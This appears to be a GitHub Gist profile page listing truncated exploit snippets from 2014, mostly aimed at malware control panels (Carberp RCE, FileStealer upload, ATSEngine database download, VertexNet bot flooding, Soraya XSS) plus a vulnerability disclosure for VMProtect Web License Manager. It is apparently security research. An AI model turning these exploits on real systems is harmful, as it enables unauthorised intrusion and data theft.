Skip to content

Instantly share code, notes, and snippets.

View Xyl2k's full-sized avatar

Steven K Xyl2k

782 followers · 64 following
View GitHub Profile
@Xyl2k
Xyl2k / Zeus mmbb builder v2.9.6.1 Config decoder
Created September 14, 2014 09:14
<?php
function decode($data, $key) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
mcrypt_generic_init($td, $key, $iv);
mcrypt_generic($td, $data);
$data = mdecrypt_generic($td, $data);
@Xyl2k
Xyl2k / SpyEye backdoor
Created September 14, 2014 09:17
<?php
// Xyl2k :þ
// Thanks to EsSandre for the additional help.
$MySQLI = array();
/* MySQLI ID */
$MySQLI['HOST'] = 'localhost';
$MySQLI['USER'] = 'root';
@Xyl2k
Xyl2k / Carberp Remote code execution vulnerability
Created September 14, 2014 09:22
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
@Xyl2k
Xyl2k / Rovnix hash collision vulnerability
Created September 14, 2014 09:23
<?php
/**
* Defeat the weak hash function of Rovnix
* to get password from a hash.
*/
$HASH = 'fbff791ef0770855e599ea6f87d41653';
$value = getNumber($HASH);
$search = search($value, $HASH);
@Xyl2k
Xyl2k / VMProtect Web License Manager 2.2.1 Multiple vulnerabilities
Created September 14, 2014 09:24
<?php
/**
VMProtect Web License Manager 2.2.1 Multiple vulnerabilities
------------------------------------------------------------
Vendor site: http://vmpsoft.com/
First contact............: 11/09/2013
Vendor answer............: 12/09/2013
Vendor fixed the RFI/XSS.: 08/11/2013
Second contact for SQL...: 25/11/2013
@Xyl2k
Xyl2k / Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
Created September 14, 2014 09:24
import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
@Xyl2k
Xyl2k / FileStealer v1.3 Upload Vulnerability
Created September 14, 2014 09:25
<!-- FileStealer v1.3 panel upload vulnerability -->
<!-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -->
<form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data">
File: <input type="file" name="file" /> <br />
HWID: <input type="text" name="hwid" value="COOFEEBABE" /> <br />
Hash: <input type="text" name="hash" value="2c471313f06370d0866db1facb34668e" /><br />
PC: <input type="text" name="pc" value="ANDROMAQUE" /> <br />
<input type="hidden" name="step" value="1337" />
<input type="submit" value="Pwn" />
</form>
@Xyl2k
Xyl2k / ATSEngine credential disclosure vulnerability
Created September 14, 2014 09:26
<pre>
<?php
$url = getURL();
if ($url !== NULL) {
$database = @file_get_contents($url . '/db/database.db');
if ($database !== FALSE) {
file_put_contents('tmp.db', $database);
@Xyl2k
Xyl2k / VertexNet v1.1.1 Flood Bots
Created September 14, 2014 09:29
#!/usr/bin/perl
# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ
use HTTP::Request;
use LWP::UserAgent;
$URL = "http://localhost/Panel/adduser.php";
@Xyl2k
Xyl2k / Soraya XSS Vulnerability
Created September 14, 2014 09:31
import requests
import time
def StrToHex(string):
hex_str=''
for char in string:
int_char = ord(char)
hex_num = hex(int_char).lstrip("0x")
hex_str+=hex_num
return hex_str